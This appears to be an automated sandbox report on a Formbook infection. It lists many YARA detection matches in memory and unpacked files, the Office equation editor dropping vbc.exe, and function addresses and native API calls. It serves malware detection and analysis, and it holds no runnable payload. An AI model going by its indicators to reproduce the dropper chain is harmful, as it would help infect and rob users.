Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0008A2A9		4_2_0008A2A9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F5928		4_2_002F5928
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F5918		4_2_002F5918
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F5B78		4_2_002F5B78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F63E7		4_2_002F63E7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002F17B0		4_2_002F17B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0008A035		4_2_0008A035
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0008A2A9		9_2_0008A2A9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041E015		9_2_0041E015
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00401030		9_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D931		9_2_0041D931
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041DAC3		9_2_0041DAC3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041E4F6		9_2_0041E4F6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041E498		9_2_0041E498
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402D87		9_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402D90		9_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D5B6		9_2_0041D5B6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00409E60		9_2_00409E60
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041EF56		9_2_0041EF56
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402FB0		9_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ADE0C6		9_2_00ADE0C6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ADE2E9		9_2_00ADE2E9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B863BF		9_2_00B863BF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B063DB		9_2_00B063DB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AE2305		9_2_00AE2305
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B2A37B		9_2_00B2A37B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B6443E		9_2_00B6443E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B605E3		9_2_00B605E3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AFC5F0		9_2_00AFC5F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B26540		9_2_00B26540
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AE4680		9_2_00AE4680
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AEE6C1		9_2_00AEE6C1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B2A634		9_2_00B2A634
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B82622		9_2_00B82622
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AEC7BC		9_2_00AEC7BC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B0286D		9_2_00B0286D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AEC85C		9_2_00AEC85C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AE29B2		9_2_00AE29B2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B8098E		9_2_00B8098E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B749F5		9_2_00B749F5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AF69FE		9_2_00AF69FE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B8CBA4		9_2_00B8CBA4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B66BCB		9_2_00B66BCB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B82C9C		9_2_00B82C9C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B6AC5E		9_2_00B6AC5E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B10D3B		9_2_00B10D3B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AECD5B		9_2_00AECD5B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B12E2F		9_2_00B12E2F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AFEE4C		9_2_00AFEE4C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B7CFB1		9_2_00B7CFB1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B52FDC		9_2_00B52FDC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AF0F3F		9_2_00AF0F3F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B0D005		9_2_00B0D005
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B5D06D		9_2_00B5D06D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AE3040		9_2_00AE3040
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AF905A		9_2_00AF905A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B6D13F		9_2_00B6D13F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B81238		9_2_00B81238
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ADF3CF		9_2_00ADF3CF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AE7353		9_2_00AE7353
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AF1489		9_2_00AF1489
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B15485		9_2_00B15485
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B1D47D		9_2_00B1D47D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B835DA		9_2_00B835DA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AE351F		9_2_00AE351F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B6579A		9_2_00B6579A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B157C3		9_2_00B157C3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B7771D		9_2_00B7771D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B7F8EE		9_2_00B7F8EE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B5F8C4		9_2_00B5F8C4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B65955		9_2_00B65955
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B6394B		9_2_00B6394B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B93A83		9_2_00B93A83
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B6DBDA		9_2_00B6DBDA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ADFBD7		9_2_00ADFBD7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B07B00		9_2_00B07B00
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B7FDDD		9_2_00B7FDDD
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B6BF14		9_2_00B6BF14
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B0DF7C		9_2_00B0DF7C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0036A036		9_2_0036A036
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00361082		9_2_00361082
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00368912		9_2_00368912
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0036B232		9_2_0036B232
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00365B32		9_2_00365B32
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00365B30		9_2_00365B30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00362D02		9_2_00362D02
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0036E5CD		9_2_0036E5CD
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0008A035		9_2_0008A035
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02641238		11_2_02641238
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0259E2E9		11_2_0259E2E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025A7353		11_2_025A7353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025EA37B		11_2_025EA37B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025A2305		11_2_025A2305
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025C63DB		11_2_025C63DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0259F3CF		11_2_0259F3CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025B905A		11_2_025B905A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025A3040		11_2_025A3040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025CD005		11_2_025CD005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0259E0C6		11_2_0259E0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02642622		11_2_02642622
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025AE6C1		11_2_025AE6C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025A4680		11_2_025A4680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025D57C3		11_2_025D57C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025AC7BC		11_2_025AC7BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0262579A		11_2_0262579A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025DD47D		11_2_025DD47D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025B1489		11_2_025B1489
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025D5485		11_2_025D5485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025E6540		11_2_025E6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025A351F		11_2_025A351F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025BC5F0		11_2_025BC5F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02653A83		11_2_02653A83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025C7B00		11_2_025C7B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0259FBD7		11_2_0259FBD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0262DBDA		11_2_0262DBDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0264CBA4		11_2_0264CBA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025AC85C		11_2_025AC85C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025C286D		11_2_025C286D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0263F8EE		11_2_0263F8EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02625955		11_2_02625955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025B69FE		11_2_025B69FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025A29B2		11_2_025A29B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0264098E		11_2_0264098E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025BEE4C		11_2_025BEE4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025D2E2F		11_2_025D2E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025CDF7C		11_2_025CDF7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025B0F3F		11_2_025B0F3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025ACD5B		11_2_025ACD5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_025D0D3B		11_2_025D0D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0263FDDD		11_2_0263FDDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AD5B6		11_2_000AD5B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000AD931		11_2_000AD931
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000ADAC3		11_2_000ADAC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00092D87		11_2_00092D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00092D90		11_2_00092D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00099E60		11_2_00099E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00092FB0		11_2_00092FB0

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 00B23F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00ADE2A8 appears 60 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00ADDF5C appears 130 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00B2373B appears 253 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00B4F970 appears 84 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0260F970 appears 81 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0259DF5C appears 118 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0259E2A8 appears 38 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 025E3F92 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 025E373B appears 238 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A370 NtCreateFile,		9_2_0041A370
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A420 NtReadFile,		9_2_0041A420
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A4A0 NtClose,		9_2_0041A4A0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A550 NtAllocateVirtualMemory,		9_2_0041A550
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A36B NtCreateFile,		9_2_0041A36B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A41A NtReadFile,		9_2_0041A41A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A49C NtClose,		9_2_0041A49C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD00C4 NtCreateFile,LdrInitializeThunk,		9_2_00AD00C4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD0078 NtResumeThread,LdrInitializeThunk,		9_2_00AD0078
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AD0048 NtProtectVirtualMemory,LdrInitializeThunk,		9_2_00AD0048
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACF9F0 NtClose,LdrInitializeThunk,		9_2_00ACF9F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACF900 NtReadFile,LdrInitializeThunk,		9_2_00ACF900
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFAE8 NtQueryInformationProcess,LdrInitializeThunk,		9_2_00ACFAE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		9_2_00ACFAD0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFBB8 NtQueryInformationToken,LdrInitializeThunk,		9_2_00ACFBB8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACFB68 NtFreeVirtualMemory,LdrInitializeThunk,		9_2_00ACFB68
